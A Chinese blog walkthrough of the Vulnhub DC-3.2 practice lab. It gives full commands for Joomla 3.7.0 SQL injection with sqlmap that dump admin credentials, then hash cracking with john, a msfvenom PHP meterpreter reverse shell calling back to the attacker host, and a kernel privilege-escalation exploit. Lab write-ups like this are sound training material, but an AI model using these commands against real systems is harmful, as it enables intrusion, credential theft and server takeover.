当前栏目
Vulnhub靶场----3、DC-3.2
一、环境搭建
靶场下载地址:https://download.vulnhub.com/dc/DC-3-2.zip
kali:192.168.144.148
DC-3.2:192.168.144.151
更改驱动器连接设置:
二、渗透流程
nmap -T5 -sV -sT -p- -A 192.168.144.151
![](https://img-blog.csdnimg.cn/cc8268b7d78345f48143e86fa25b732d.png#pic_center)
1.访问192.168.144.151
![](https://img-blog.csdnimg.cn/39e1528f1d17482f95c509987de95fa7.png#pic_center)
2.web指纹扫描如下
网站使用joomla CMS,使用
joomscan工具
扫描
joomscan --url 192.168.144.151
点击了解👉joomscan扫描工具使用详解
![](https://img-blog.csdnimg.cn/0a68fdb601e64f48b65dd4db4ed148aa.png#pic_center)
![](https://img-blog.csdnimg.cn/4ee78efe6a244a20a6f970612863146c.png#pic_center)
3.漏洞获取
可用信息:
获取到joomla版本3.7.0
>寻找相关版本漏洞:searchsploit joomla 3.7.0 -w
搜索结果显示两个漏洞:
CVE-2015-8562 反序列化漏洞:https://www.exploit-db.com/exploits/43488
CVE-2017-8917 SQL注入漏洞:https://www.exploit-db.com/exploits/42033
![](https://img-blog.csdnimg.cn/3671ff29b64c44c6851a266528c0d696.png#pic_center)
CVE-2015-8562 反序列化漏洞
CVE-2017-8917 SQL注入漏洞
exploits-db数据库记录了详细的利用过程,如下:
![](https://img-blog.csdnimg.cn/ff03996ed6eb4531a40404833aa09f4c.png#pic_center)
1.获取数据库
sqlmap -u "http://192.168.144.151/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
![](https://img-blog.csdnimg.cn/c725a3173cd74c3b8ce64afd7d6c357f.png#pic_center)
2.joomladb数据库的表
sqlmap -u "http://192.168.144.151/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables
![](https://img-blog.csdnimg.cn/76c1f05ca61148ceb25e6e38b510f6c9.png#pic_center)
3.“#__users” 表的字段
sqlmap -u "http://192.168.144.151/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password --dump
![](https://img-blog.csdnimg.cn/0914157e906342bd81074ffa9e21670f.png#pic_center)
4.密码解密
password采用bcrypt加密
👉bcrypt加密算法详解
使用john破解密码:snoopy
vi创建dc-3.2,将密码保存到dc-3.2
john爆破密码john dc-3.2 --show
密码为:snoopy
![](https://img-blog.csdnimg.cn/4b006f6debe64c2c968360eac4fe86d6.png#pic_center)
5.进入后台
admin:snoopy
登陆后台地址:http://192.168.144.151/administrator
![](https://img-blog.csdnimg.cn/cac3b3aa0505402596d1c3e43258bcf9.png#pic_center)
![](https://img-blog.csdnimg.cn/de5b81d193e946a5b3b75bc1fd079c21.png#pic_center)
![](https://img-blog.csdnimg.cn/220fb95e8c0b461291187aaa1d5accec.png#pic_center)
1.生成反弹shell
将shell内容复制到刚创建的dc.php文件中
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.144.148 LPORT=4444 > dc.php
![](https://img-blog.csdnimg.cn/3b16760e6a1c4ac0b16226fc5ffe1742.png#pic_center)
![](https://img-blog.csdnimg.cn/3bc8f82676294fda918a186444b7ee87.png#pic_center)
2.kali开启监听:
use exploit/multi/handler
set payload /php/meterpreter/reverse_tcp
set LHOST 192.168.144.148
set LPORT 4444
run
3.访问webshell地址
http://192.168.144.151/templates/protostar/dc.php
4.获取临时shell
shell #获取临时shell
python -c 'import pty;pty.spawn("/bin/bash")' #交互式shell
![](https://img-blog.csdnimg.cn/4e640e1b95014851bec2f40d6fb66805.png#pic_center)
1.获取服务器版本
uname -a
lsb_release -a
![](https://img-blog.csdnimg.cn/46caa4d5cc544036a6dbd235b3e53680.png#pic_center)
2.ubuntu 16.04 相关漏洞
searchsploit ubuntu 16.04
![](https://img-blog.csdnimg.cn/fa1da296d59a430cb634fba2a8c6a627.png#pic_center)
3.下载提权exp
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
![](https://img-blog.csdnimg.cn/0fcd197ff88946749e858924425673d3.png#pic_center)
4.通过蚁剑将exploit.tar
上传至脚本所在目录
5.解压exploit.tar
6.获取root权限
三、思路总结
1、只开放80端口的情况下,网站指纹、目录扫描等方向
2、通过网站CMS版本信息搜索相关版本漏洞
3、利用版本SQL注入漏洞获取后台登录账号密码
4、后台寻找webshell插入地址
5、获取shell,寻找服务器版本漏洞
6、利用服务器版本漏洞提权
相关文章
- 前端面试 【JavaScript】— typeof 是否能正确判断类型?
- 前端面试 【JavaScript】— instanceof 能否判断基本数据类型?
- 前端面试 【JavaScript】— 能不能手动实现一下 instanceof 的功能?
- 前端面试 【JavaScript】— Object.is和=== 有什么区别?
- 前端面试 【JavaScript】— JS中类型转换有哪几种?
- 前端面试 【JavaScript】— == 和 ===有什么区别?
- 前端面试 【JavaScript】— 对象转原始类型是根据什么流程运行的?
- JavaScript 的 parseInt() 函数
- javascript实现两个数字进行组合
- JS监听键盘按键
- 大前端开发中的路由管理之五:Flutter篇
- Javascript的DOM操作
- 在Vue项目中使用WebSocket技术
- 新手向:前端程序员必学基本技能——调试JS代码
- React 毁了 Web 开发!
- 「JS 逆向百例」cnki 学术翻译 AES 加密分析
- 商标注册域名后缀用什么?商标和域名有哪些区别?
- 网站建设流程是怎样的?需要看重哪些细节?
- 网站域名商标注册流程是什么?网站域名商标有什么用?
- 如何建设一个实用性强的网站 网站上线后如何运营